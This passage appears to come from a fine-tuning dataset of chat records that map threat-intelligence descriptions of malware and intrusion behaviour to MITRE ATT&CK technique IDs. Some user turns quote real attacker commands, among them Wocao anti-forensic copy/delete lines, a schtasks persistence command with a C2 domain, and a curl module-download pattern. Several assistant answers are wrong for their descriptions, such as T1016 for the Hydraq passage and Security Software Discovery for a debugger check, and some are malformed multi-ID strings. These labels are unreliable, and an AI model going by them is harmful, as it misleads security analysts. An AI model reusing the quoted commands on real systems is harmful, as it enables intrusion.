"role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration." }, { "role": "assistant", "content": "T1114 - Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete files and optionally overwrite with random data beforehand." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to search for a given filename on a victim." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyZBot contains keylogger functionality." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, the threat actors consistently removed traces of their activity by first overwriting a file using `/c cd /d c:\\windows\\temp\\ & copy \\\\\\c$\\windows\\system32\\devmgr.dll \\\\\\c$\\windows\\temp\\LMAKSW.ps1 /y` and then deleting the overwritten file using `/c cd /d c:\\windows\\temp\\ & del \\\\\\c$\\windows\\temp\\LMAKSW.ps1`." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. While GDPR requirements prevented us from pivoting on Registrant information, the actors reused IP space, reused a certificate, and the aforementioned domain mimicking technique allowed for some pivoting. Toolset . Once gaining a foothold on a user’s system, the threat actors behind STOLEN PENCIL use Microsoft’s Remote Desktop Protocol (RDP) for remote point-and-click access. This means a human is behind the keyboard interacting with a compromised system, and not using a RAT (Remote Access Trojan) with a command-and-control site acting as a proxy between the threat actor and the compromised system. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. GREASE a tool to add a Windows administrator account with a specific username/password and enable RDP, circumventing any firewall rules. defaultes/1qaz2wsx#EDC - a tool to add a Windows administrator account with a specific username/password and enable RDP, circumventing any firewall rules. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Using a combination of stolen passwords, backdoor accounts, and a forced-open RDP service, the threat actors are likely to retain a foothold on a compromised system. Conclusion . While we were able to gain insight into the threat actor’s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity" }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NavRAT copies itself into a running Internet Explorer process to evade detection." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has sent spearphishing attachments attempting to get a user to open them." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several malware families are capable of downloading and executing binaries from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates scheduled tasks to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRatReporter sent collected system and network information compiled into a report to an adversary-controlled C2." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used brute force techniques to obtain credentials." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp uses the \"ifconfig -a\" command." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly deleted system, security, terminal services, remote services, and audit logs from a victim." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET downloads browser specific AppleScript modules using a constructed URL with the \"curl\" command, \"https://\" & domain & \"/agent/scripts/\" & moduleName & \".applescript\"." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent has sent data related to a compromise host over its C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peirates can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts." }, { "role": "assistant", "content": "T1550.001 - Application Access Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc()." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has deployed malware that has copied itself to the startup directory for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When it first starts, crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER may collect network configuration data by running \"ipconfig /all\" on a victim." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A key trait of NOBELIUM’s ongoing activity over the last year has been the abuse of indirect paths and trust relationships to target and gain access to victims of interest for intelligence gain. In the most recent campaign, this has manifested in a compromise-one-to-compromise-many approach—exploiting the service providers’ trust chain to gain broad access to multiple customer tenants for subsequent attacks. NOBELIUM leverages established standard business practices, to target downstream customers across multiple managed tenants. These delegated administrative privileges are often neither audited for approved use nor disabled by a service provider or downstream customer once use has ended, leaving them active until removed by the administrators. If NOBELIUM has compromised the accounts tied to delegated administrative privileges through other credential-stealing attacks, that access grants actors like NOBELIUM persistence for ongoing campaigns" }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script itself works as a downloader for additional files needed for loading the malware into the system, which are hosted separately as a ZIP package. We confirmed two different techniques used for distributing the Melcoz backdoor: the AutoIt loader script and DLL Hijack" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE has used \"FileReadZipSend\" to compress a file and send to C2." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used Cain & Abel to crack password hashes." }, { "role": "assistant", "content": "T1110.002 - Brute Force: Password Cracking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. The backchannel URL addresses have been changed by the Dynamic DNS sites to resolve to a loopback address (127.0.0.2). This in effect severs the connection to the control servers. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the “attack surface” by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN5 has cleared event logs from victims." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MESSAGETAP checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel can automatically scan for and collect files with specific extensions." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to identify running processes and associated plugins on an infected host." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has the ability to list the names of all open windows on the infected host." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIVEHANDS has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrifeWater can collect the user name from the victim's machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains the getFirefoxPassword function to attempt to locate Firefox passwords." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GuLoader can download further malware for execution on the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather the victim user name." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ScreenUtil module, which was first reported in 2017, takes a screenshot of the current user's desktop. All variants analyzed by CTU researchers were hard-coded to drop the captured image files to %APPDATA%\\Update\\Tmp" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepySnail can use Base64 to encode its C2 traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script will send the specified number of DNS queries using the following format, each of which the C2 will respond with an IPv6 address that the script will treat as a string of data:   www...   The payload will treat the data provided by the C2 as a message, which will have the following structure:   hello   The message will start with the string hello followed by a 35-character UUID string" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As described in other blog posts, Remcos appears to be developed in C++. As the release notes show, it is actively maintained. 17, 2017 Remcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques that make it difficult for the typical user to detect the existence of Remcos. A good example is the anti-analysis section: It is checking for an outdated artifact, the 'SbieDll.dll'. In our opinion, there are not many analysts using Sandboxie these days anymore. Below you can see the Remcos VMware detection code: The following is a code sample from aldeid.com: The blog referenced above has already described several functions of Remcos features in detail. We would like to focus on Remcos' cryptographic implementation. It uses RC4 pretty much everywhere when there is a need to decode or encode any data. Examples are registry entries, C2 server network communication or file paths shown below: The exepath registry data is base64-encoded, RC4-encrypted data. This can be converted into the typical RC4 pseudo code" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Most samples maintain persistence by setting the Registry Run key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ in the HKLM or HKCU hive, with the Registry value and file name varying by sample." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems." }, { "role": "assistant", "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MechaFlounder begins by entering a loop that will continuously attempt to communicate with its C2 server. The Trojan will use HTTP to send an outbound beacon to its C2 server that contains the user's account name and hostname in the URL. The code, seen in Figure 2, builds the URL by concatenating the username and hostname with two dashes \"--\" between the two strings. The code then creates the URL string by using the username and hostname string twice with the back-slash \"\\\" character between the two and by appending the string \"-sample.html" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used mshta.exe to execute VBScript to execute malicious code on victim systems." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QAKBOT abuses Wscript to execute a Jscript file." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 used GetPassword_x64 to harvest credentials." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tomiris can download files and execute them on a victim's system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the \"Invoke-PSRemoting\" module." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "hides collected data in password-protected .rar archives." }, { "role": "assistant", "content": "T1560 - Archive Collected Data', 'T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An APT32 backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TIN WOODLAWNTIN WOODLAWN is a targeted threat group, active since at least 2014, that CTU researchers assess with moderate confidence is operated or tasked by the Vietnamese government. TIN WOODLAWN is technically capable and uses a range of techniques including template injection, obfuscated macros and steganography for malware delivery, memory-resident malware, use of native command line scripts for Cobalt Strike persistence, and non-standard command and control channels such as DNS and ICMP.ToolsTaegis™ XDR Adversary Software Coverage Tool" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used CVE-2016-7255 to escalate privileges." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit's \"Invoke-TokenManipulation\" Exfiltration module can be used to manipulate tokens." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used VBS and JavaScript scripts to help perform tasks on the victim's machine." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A string with the 5-character length and encoded with BASE64 is added to the beginning of the buffer encoded using the BASE64 algorithm" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro has named malicious browser extensions and update files to appear legitimate." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanHaiShu uses mshta.exe to load its program and files." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT has used HTTP if DNS C2 communications were not functioning." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malicious processes are marked red (click image to enlarge): The following malicious files are dropped and run: C:\\ProgramData\\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\\OFFLINE\\9A189DFE\\C7B7C186\\main.vbs dcac79d7dc4365c6d742a49244e81fd0 C:\\Users\\Public\\Libraries\\RecordedTV\\DnE.ps1 7fe0cb5edc11861bc4313a6b04aeedb2 C:\\Users\\Public\\Libraries\\RecordedTV\\DnS.ps1 3920c11797ed7d489ca2a40201c66dd4 “C:\\Windows\\System32\\schtasks.exe” /create /F /sc minute /mo 3 /tn “GoogleUpdateTasksMachineUI” /tr C:\\Users\\Public\\Libraries\\RecordedTV\\backup.vbs 7528c387f853d96420cf7e20f2ad1d32 Command and control server is located in the following domain: tecsupport[.]in A detailed analysis of the malware is provided in two posts by Palo Alto networks and in a post by FireEye, which wrote about previous campaigns by this threat agent" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once run, the wiper will damage the Master Boot Record (MBR) of the infected computer, rendering it inoperable" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has created a directory named \"out\" in the user's %AppData% folder and copied files to it." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This RAT is also known for its keylogging and file transfer functionality. As such, any remote attacker can load any files onto the infected machine or even steal documents" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel has been distributed as a malicious attachment within a spearphishing email." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman has been delivered via spearphishing emails that contain a malicious zip file." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The BlackEnergy component KillDisk is capable of deleting Windows Event Logs." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Azorult can collect the username from the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The main function of the Trojan interacts with its configured C2 server to obtain additional code to execute" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM primarily relies on compromised domain credentials to move through the target network, and as outlined above, uses several credential harvesting tools. Once they have acquired credentials, the activity group uses PsExec extensively to move laterally between hosts in the target network" }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT used TLS to encrypt command and control (C2) communications." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has been disguised as a legitimate executable, including as Windows SDK." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It maintains both code and data in the raw, encrypted blobs of data to be decrypted and used at runtime, and hidden functionality that isn’t exposed 